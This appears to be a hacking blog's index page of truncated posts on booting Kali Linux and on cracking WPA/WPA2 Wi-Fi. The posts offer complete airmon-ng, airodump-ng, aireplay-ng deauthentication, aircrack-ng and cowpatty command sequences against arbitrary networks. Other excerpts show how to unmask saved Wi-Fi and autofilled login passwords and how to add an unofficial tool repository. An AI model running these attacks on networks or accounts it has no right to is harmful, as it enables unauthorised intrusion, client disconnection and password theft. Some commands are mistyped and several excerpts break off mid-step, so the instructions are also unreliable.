Posts

TO BOOT KALI LINUX USING USB  >>first connect the usb to your pc and then power on the system >>then click f12 or f10 based on the system you are using. >>so you will be entering the boot menu >>then select the USB and then click enter and  >>thats it now u can use kali linux
Image
How to create a KALI LINUX LIVE USB A  verified  copy of the appropriate ISO image of the latest Kali build image for the system you’ll be running it on: see the details on  downloading official Kali Linux images . If you’re running under Windows, you’ll also need to download the  Win32 Disk Imager  utility.  A USB thumb drive, 4GB or larger. (Systems with a direct SD card slot can use an SD card with similar capacity. The procedure is identical.) Kali Linux Live USB Install Procedure Creating a Bootable Kali USB Drive on Windows Plug your USB drive into an available USB port on your Windows PC, note which drive designator (e.g. “F:\”) it uses once it mounts, and launch the Win32 Disk Imager software you downloaded. Choose the Kali Linux ISO file to be imaged and verify that the USB drive to be overwritten is the correct one. Click the “Write” button. Once the imaging is complete, safely eject the USB drive from the Windows machine. You ...

Hack WPA & WPA2 USING KALI LINUX

COMMANDs TO CRACK WPA & WPA2 using kali linux: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  crack wpa/wpa2-with-cowpatty-and-negpmk-on-kali-linux airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write latesthackingnews --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0  cowpatty -f darkc0de.lst -r latesthackingnews -s [ESSID of the wifi] genpmk -f darkc0de.lst -d pregendump -s [ESSID of the wifi] cowpatty -d pregendump -r latesthackingnews-01.cap -s ...
Image
BRUTE FORCE Cracking WPA/WPA2 – PSK Encryption I’m going to hack into a Wi-Fi hotspot that I just set up, named – Anonymus. Now, given that we have Kail Linux, open up a terminal window, type in “ifconfig “. This is going to list all the networking interfaces connected to your device. Here, we only need (wlan0) which is our Wi-Fi card, so we can disable the others by doing “ifconfig <name of the interface> down”. (“lo” does no matter)… Now, we type “airmon-ng start wlan0” (airmon-ng is just a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring) It’ll probably show “some processes that could cause trouble”, we’ll simply kill those processes by entering “kill <process ID>”. Now if we do “ifconfig”, it should show us the newly made monitoring interface “mon0”. Then, put in, “airodump-ng mon0”. In the screenshot below, the highlighted bssid is our target (and it is my o...
Image
               Hack Wi-Fi: Cracking WPA2-PSk                Using Aircrack-Ng Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out  this guide . This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type: airmon-ng start wlan0 Note that airmon-ng has renamed your  wlan0  adapter to  mon0 . Step 2: Capture Traffic with Airodump-Ng Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the  airodump-ng  command. This command grabs all the traffic that your wireless adapter can see and displays c...
Image
SOME TRICKS TO FIND SAVED PASSWORDS   WI-FI:             To find the saved wi-fi password in your laptop. open command prompt type "netsh wlan show profiles" then you will see all the networks you have connected till now then type "netsh wlan show profiles "_"" fill ssid of the wifi in place of  '_'. then type"netsh wlan show profiles _  key=clear key content: 123456789 is the password of mine in the same way you can see   the wifi password you have used to connect to network  LOGIN PAGE: (like Gmail, Facebook..........) right click on password (ie auto filled)  click on "inspect elements" then change 'type ' from  'password ' to 'text ' and click enter password will be visible
HOW TO HACK WI-FI WITH OUT KALI LINUX ?                Keep in mind that Kali Linux (formerly called "Backtrack") is not needed for hacking. OBTAINING REQUIRED TOOLS:         To begin , Install the needed packages. Some distros contain the needed tools in the default repos and others do not.  If they are not in the Ubuntu repos, add the "ppa:darklordpaunik8880/kalibuntu" PPA by typing "apt-add-repository ppa:darklordpaunik8880/kalibuntu". Once the repos are add, then on Debian-based systems,   Type "apt-get install aircrack-ng".(The "aircrack-ng" package adds many WiFi hacking tools and the package's dependencies provide additional utilities) Attack: Open a terminal and type "airmon-ng".  This will display a list of detected WiFi devices on the local system that support monitoring (this feature is needed).  Then, type "airmon-ng start INTERFACE" where "INTERFACE" is the desire...